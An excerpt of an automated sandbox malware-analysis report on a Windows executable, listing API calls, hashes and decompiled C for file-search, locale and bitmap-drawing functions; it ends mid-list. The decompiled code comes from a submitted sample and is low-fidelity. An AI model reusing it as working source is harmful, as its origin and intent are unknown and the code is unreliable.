                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                          • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                                          • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                          • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040EB16, Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                          • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                                          • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                          • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040EA04, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                                          • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                          • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                                          • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                          • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403CB4, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E00403CB4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x403d1a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004031F4( &_v20, 7,  &_v15);
				E0040269C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00403D21);
				return E00403094( &_v20);
			}








                                                                          0x00403cbd
                                                                          0x00403cc2
                                                                          0x00403cc3
                                                                          0x00403cc8
                                                                          0x00403ccb
                                                                          0x00403cda
                                                                          0x00403cea
                                                                          0x00403cf5
                                                                          0x00403d00
                                                                          0x00403d00
                                                                          0x00403d06
                                                                          0x00403d09
                                                                          0x00403d0c
                                                                          0x00403d19

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                          • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                                          • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                          • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040D74C, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                          • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
                                                                          • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                          • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040F270, Relevance: 1.5, APIs: 1, Instructions: 10timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID:
                                                                          • API String ID: 481472006-0
                                                                          • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                          • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                                          • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                          • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 022C8D16, Relevance: .6, Instructions: 559COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, Offset: 022C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_22c0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05431e9a872c7f0021e2b6e11609bc723c439c8a6bcbf61c45db280db772ba5d
                                                                          • Instruction ID: 56fd56cc449bc6843bfa656e9d82b7eae05cdc5c2a46680ff4330973667a736e
                                                                          • Opcode Fuzzy Hash: 05431e9a872c7f0021e2b6e11609bc723c439c8a6bcbf61c45db280db772ba5d
                                                                          • Instruction Fuzzy Hash: 8E22807240E3D19FC7534BB498B56E2BFB4AE2722431E49DBD0C08F067E225195ADB72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				struct HBITMAP__* _t62;
				void* _t68;
				void* _t71;
				int _t72;
				int _t75;
				int _t80;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t100;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t119;
				signed int _t121;
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t125;
				RECT* _t126;
				void* _t128;

				_t128 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t128 != 0) {
					asm("pushad");
					_t100 = _t59;
					 *((intOrPtr*)(_t100 + 0x34))();
					 *((intOrPtr*)(_t100 + 0x28)) = 0;
					 *((intOrPtr*)(_t100 + 0x56)) = 0;
					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t100 + 0x3d);
					_t121 =  *(_t62 + 4);
					_t119 =  *(_t62 + 8);
					if(_t119 < 0) {
						_t119 =  ~_t119;
					}
					_push(0);
					L00404108();
					_push(_t62);
					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
					if( *((char*)(_t100 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t124 = 0;
						_t110 =  *(_t100 + 0x18);
						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
						__eflags =  *(_t100 + 0x49) - 5;
						if( *(_t100 + 0x49) == 5) {
							E0040600C(_t67, _t110);
						}
						_pop(_t68);
						_push(_t68);
						_push(E00406268(_t68) *  *(_t100 + 0x18));
						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
						_push(_t71);
						_push(0);
						_push(_v12);
						_push(_t71);
						_t72 =  *(_t100 + 0x18);
						__eflags = _t72 - _t119;
						if(__eflags > 0) {
							_t72 = _t119;
						}
						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
						_t113 =  *(_t100 + 0x18);
						__eflags = _t113 - _t119;
						if(_t113 > _t119) {
							_t113 = _t119;
						}
						__eflags = _t75 - _t113;
						if(__eflags != 0) {
							_pop(_t81);
							E00402468(_t81);
							_push(0);
							_push(0);
							_push(0);
							_push(_t126);
							_push(0);
							_push(_v40);
							_push(_v36);
							L00404110();
							_t121 = _t121 ^ 0xffffffff;
							_t124 = 0;
							_t85 = SelectObject(_v60, 0);
							_t113 = _v68;
							__eflags = 0;
							E00406094(_t100, 0, _v68, 0, 0);
							SelectObject(_v72, _t85);
						}
						E00406024(_t100, _t100, _t113, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t100 + 0x20) = _t124;
						__eflags = _t121;
						 *(_t100 + 0x72) = 0;
						if(_t121 < 0) {
							_t52 = _t100 + 0x72;
							 *_t52 =  *(_t100 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_push(0);
						L00404178();
						_push(_t62);
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(_t62);
						L00404100();
						_t125 = _t62;
						L00404190();
						_t116 = 0;
						_push(_t116);
						_push(SelectObject(_t116, _t125));
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(0);
						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
						_t117 = _t126;
						FillRect(_v44, _t126, _t94);
						DeleteObject(_t94);
						asm("jecxz 0x24");
						SelectObject(_v60, 0);
						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
						E00406024(_t100, _t100, _t117, _t130);
						 *(_t100 + 0x20) = _t125;
					}
					asm("jecxz 0xa");
					_pop(_t114);
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
					_t80 = DeleteDC(_t119);
					asm("popad");
					return _t80;
				}
				return _t59;
			}






























                                                                          0x0040627c
                                                                          0x0040627c
                                                                          0x0040627d
                                                                          0x00406282
                                                                          0x00406283
                                                                          0x00406289
                                                                          0x0040628a
                                                                          0x0040628c
                                                                          0x00406291
                                                                          0x00406294
                                                                          0x00406297
                                                                          0x004062a3
                                                                          0x004062a5
                                                                          0x004062a8
                                                                          0x004062ab
                                                                          0x004062b0
                                                                          0x004062b2
                                                                          0x004062b2
                                                                          0x004062d5
                                                                          0x004062d7
                                                                          0x004062dc
                                                                          0x004062dd
                                                                          0x004062e1
                                                                          0x00406397
                                                                          0x00406399
                                                                          0x0040639e
                                                                          0x004063a6
                                                                          0x004063a7
                                                                          0x004063ab
                                                                          0x004063ad
                                                                          0x004063ad
                                                                          0x004063b2
                                                                          0x004063b3
                                                                          0x004063be
                                                                          0x004063bf
                                                                          0x004063c4
                                                                          0x004063c5
                                                                          0x004063c7
                                                                          0x004063cb
                                                                          0x004063cc
                                                                          0x004063cf
                                                                          0x004063d1
                                                                          0x004063d3
                                                                          0x004063d3
                                                                          0x004063e4
                                                                          0x004063e9
                                                                          0x004063ec
                                                                          0x004063ee
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f2
                                                                          0x004063f4
                                                                          0x004063f6
                                                                          0x004063f7
                                                                          0x004063fe
                                                                          0x00406405
                                                                          0x00406406
                                                                          0x00406407
                                                                          0x00406408
                                                                          0x0040640a
                                                                          0x0040640b
                                                                          0x0040640f
                                                                          0x00406414
                                                                          0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x0040637d
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x0040646b

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                          • 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                          • 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                          • FillRect.USER32 ref: 0040632E
                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040FD14, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                          • 72E7A590.GDI32(00000000), ref: 0040FD6F
                                                                          • 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 57%
                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				struct HBITMAP__* _t69;
				void* _t75;
				void* _t78;
				int _t79;
				int _t82;
				int _t87;
				void* _t88;
				void* _t92;
				void* _t101;
				void* _t108;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t133;
				struct HDC__* _t135;
				struct HDC__* _t137;
				void* _t139;
				int* _t140;
				struct HDC__* _t142;
				signed int _t144;
				struct HBITMAP__* _t147;
				struct HBITMAP__* _t148;
				RECT* _t149;
				void* _t151;

				_t151 = __eflags;
				_t113 = __eax;
				_t64 = E00406144(__eax);
				if(_t151 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t115 = _t66;
							 *((intOrPtr*)(_t115 + 0x34))();
							 *((intOrPtr*)(_t115 + 0x28)) = 0;
							 *((intOrPtr*)(_t115 + 0x56)) = 0;
							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t115 + 0x3d);
							_t144 =  *(_t69 + 4);
							_t142 =  *(_t69 + 8);
							__eflags = _t142;
							if(_t142 < 0) {
								_t142 =  ~_t142;
							}
							_push(0);
							L00404108();
							_push(_t69);
							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
							if( *((char*)(_t115 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t147 = 0;
								_t129 =  *(_t115 + 0x18);
								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
								__eflags =  *(_t115 + 0x49) - 5;
								if( *(_t115 + 0x49) == 5) {
									E0040600C(_t74, _t129);
								}
								_pop(_t75);
								_push(_t75);
								_push(E00406268(_t75) *  *(_t115 + 0x18));
								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
								_push(_t78);
								_push(0);
								_push(_v12);
								_push(_t78);
								_t79 =  *(_t115 + 0x18);
								__eflags = _t79 - _t142;
								if(__eflags > 0) {
									_t79 = _t142;
								}
								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
								_t132 =  *(_t115 + 0x18);
								__eflags = _t132 - _t142;
								if(_t132 > _t142) {
									_t132 = _t142;
								}
								__eflags = _t82 - _t132;
								if(__eflags != 0) {
									_pop(_t88);
									E00402468(_t88);
									_push(0);
									_push(0);
									_push(0);
									_push(_t149);
									_push(0);
									_push(_v40);
									_push(_v36);
									L00404110();
									_t144 = _t144 ^ 0xffffffff;
									_t147 = 0;
									_t92 = SelectObject(_v60, 0);
									_t132 = _v68;
									__eflags = 0;
									E00406094(_t115, 0, _v68, 0, 0);
									SelectObject(_v72, _t92);
								}
								E00406024(_t115, _t115, _t132, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t115 + 0x20) = _t147;
								__eflags = _t144;
								 *(_t115 + 0x72) = 0;
								if(_t144 < 0) {
									_t56 = _t115 + 0x72;
									 *_t56 =  &( *(_t115 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_push(0);
								L00404178();
								_push(_t69);
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(_t69);
								L00404100();
								_t148 = _t69;
								L00404190();
								_t135 = 0;
								_push(_t135);
								_push(SelectObject(_t135, _t148));
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(0);
								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
								_t136 = _t149;
								FillRect(_v44, _t149, _t101);
								DeleteObject(_t101);
								asm("jecxz 0x24");
								SelectObject(_v60, 0);
								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
								E00406024(_t115, _t115, _t136, __eflags);
								 *(_t115 + 0x20) = _t148;
								L25:
								asm("jecxz 0xa");
								_pop(_t133);
								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
								_t87 = DeleteDC(_t142);
								asm("popad");
								return _t87;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t113, __edx);
					_pop(_t137);
					if(_t64 == _t137) {
						goto L7;
					} else {
						_t108 = _t113;
						if(_t137 != 0) {
							 *(_t113 + 0x49) = _t137;
							__eflags = _t137 - 5;
							if(_t137 == 5) {
								_t137 = _t137 - 1;
								__eflags = _t137;
							}
							L27();
							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t139 = _t137;
							__eflags = _t111 - _t139;
							_t64 = _t113;
							goto L7;
						} else {
							_t140 =  &(_t137->i);
							if(_t140 !=  *(_t108 + 0x3c)) {
								 *(_t108 + 0x3c) = _t140;
								L9();
								return _t108;
							}
							return _t108;
						}
					}
				}
			}






































                                                                          0x00406218
                                                                          0x00406219
                                                                          0x0040621b
                                                                          0x00406220
                                                                          0x0040625d
                                                                          0x0040625e
                                                                          0x0040627d
                                                                          0x00406282
                                                                          0x00406283
                                                                          0x00406289
                                                                          0x0040628a
                                                                          0x0040628c
                                                                          0x00406291
                                                                          0x00406294
                                                                          0x00406297
                                                                          0x004062a3
                                                                          0x004062a5
                                                                          0x004062a8
                                                                          0x004062ab
                                                                          0x004062ae
                                                                          0x004062b0
                                                                          0x004062b2
                                                                          0x004062b2
                                                                          0x004062d5
                                                                          0x004062d7
                                                                          0x004062dc
                                                                          0x004062dd
                                                                          0x004062e1
                                                                          0x00406397
                                                                          0x00406399
                                                                          0x0040639e
                                                                          0x004063a6
                                                                          0x004063a7
                                                                          0x004063ab
                                                                          0x004063ad
                                                                          0x004063ad
                                                                          0x004063b2
                                                                          0x004063b3
                                                                          0x004063be
                                                                          0x004063bf
                                                                          0x004063c4
                                                                          0x004063c5
                                                                          0x004063c7
                                                                          0x004063cb
                                                                          0x004063cc
                                                                          0x004063cf
